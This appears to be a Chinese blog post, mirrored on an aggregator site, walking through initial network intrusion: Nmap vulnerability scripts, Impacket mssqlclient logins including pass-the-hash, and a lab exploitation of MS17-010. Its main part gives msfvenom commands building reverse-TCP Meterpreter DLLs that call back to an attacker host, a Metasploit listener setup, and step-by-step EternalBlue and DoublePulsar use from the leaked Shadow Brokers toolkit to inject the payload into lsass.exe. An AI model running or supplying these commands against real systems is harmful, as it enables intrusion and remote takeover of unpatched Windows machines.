IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 打点-进入内网(一) -> 正文阅读

[系统运维]打点-进入内网(一)


常见漏洞扫描

1.Nmap扫描技巧

  • auth 处理身份验证
  • broadcast 网络广播
  • brute 暴力猜解
  • default 默认
  • discovery 服务发现
  • dos 拒绝服务
  • exploit 漏洞利用
  • external 外部扩展
  • fuzzer 模糊测试
  • intrusive 扫描可能造成不良后果
  • malware 检测后门
  • safe 扫描危害较小
  • version 版本识别
  • vuln漏洞检测

通用参数- vuln

nmap --script=vuln 192.168.70.147

在这里插入图片描述
MS17-010

nmap --script=smb-vuln-ms17-010 192.168.70.147

在这里插入图片描述

2.impacket框架之mssql服务器安全检测

????在实际渗透测试工作中经常会遇到检测项目中mssql服务器安全性
impacket框架:https://github.com/SecureAuthCorp/impacket

mssglclient与其他工具相比的优势

  • 跨平台,python脚本编写,并且已有exe版本
  • 命令行执行,速度快
  • 支持使用socks代理传输数据
  • 支持以hash传递的方式进行账号验证
  • 支持Windows认证模式进行mssql服务的安全检测
  • 执行sql命令可以是交互式,也可以直接回显sql命令执行结果

Mssqlclient的基本使用命令为

验证以Windows认证模式的mssql服务

python mssqlclient.py domain/username:password@ip -windows-auth

验证以mssql账号密码认证的mssql服务

python mssqlclient.py ./username:password@ip

验证以mssql账号密码认证的mssql服务,并执行command.txt内的sql命令

python mssqlclient.py ./username:password@ip -file command . txt

Impacket网络协议工具包安装

Kali Linux安装Impacket

我们通过git clone命令克隆存储库

git clone https://github.com/SecureAuthCorp/impacket  
cd impacket/
python setup.py install

在这里插入图片描述

查看工具

cd impacket/examples
ls

在这里插入图片描述

Windows安装Impacket

在这个github上直接下载即可
https://github.com/maaaaz/impacket-examples-windows

在这里插入图片描述

3.MS17_010 py脚本利用

前言
为什么要介绍用py脚本?因为有些机器存在漏洞,但是使用MSF的模块利用失败,而使用py脚本则能成功利用。

利用

在本地用虚拟机搭建了Kali和windows7系统
192.168.70.147 虚拟机XP(需安装Python2.6.6和pywin32安装包 )
192.168.70.11 虚拟机Kali IP
192.168.70.130 虚拟机windows7 IP
即:192.168.70.147 是操作机 192.168.70.130是靶机

在kali中用metasploit生成64位的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll

192.168.70.11 是Kali的IP, LPORT可以随意设置。但是之后的LPORT必须与此时设置的端口要一致!

生成了dll
在这里插入图片描述

msfconsole   //进入控制台
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 192.168.70.11 //设置本地IP
set LPORT 8089 //设置本地端口
run //运行

在这里插入图片描述

下载shadowbroker:https://github.com/root-tools/shadowbroker
进入shadowbroker文件夹下的windows文件夹内先创建一个listeningposts的空文件夹打开fb.py,否则会报错
在这里插入图片描述

在这里插入图片描述
设置全局参数
Default Target IP Address(默认靶机IP): 192.168.70.130
Default Callback IP Address(默认监控主机IP): 192.168.70.11
Use Redirection(使用重定向): no
Set LogDir(设置日志路径): c:\logs
Project(0是创建一个新的项目):0
New Project Name(项目名称):Test_Win7
在这里插入图片描述
use Eternalblue使用Eternalblue插件
使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。

use Eternalblue

在这里插入图片描述
一路回车
在这里插入图片描述
这里根据目标的系统选择0或1,因为靶机是win7,所以选1
在这里插入图片描述
这里要选择攻击方式,选择FB,即1
在这里插入图片描述
成功调用插件
在这里插入图片描述
接下来使用doublepulsar插件
与EternalBlue一样,需要选择靶机系统类型。
ProcessName [lsass.exe]者一项是默认,否则无法运行后门。

use doublepulsar

在这里插入图片描述
一路回车
在这里插入图片描述
这里选择smb方式
在这里插入图片描述
这里选择x64
在这里插入图片描述
这里选择dll
在这里插入图片描述
这里写dll文件的路径
在这里插入图片描述

在这里插入图片描述

一路回车
在这里插入图片描述
在这里插入图片描述

成功
在这里插入图片描述
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-25 12:36:42  更:2021-08-25 12:38:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 12:29:10-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码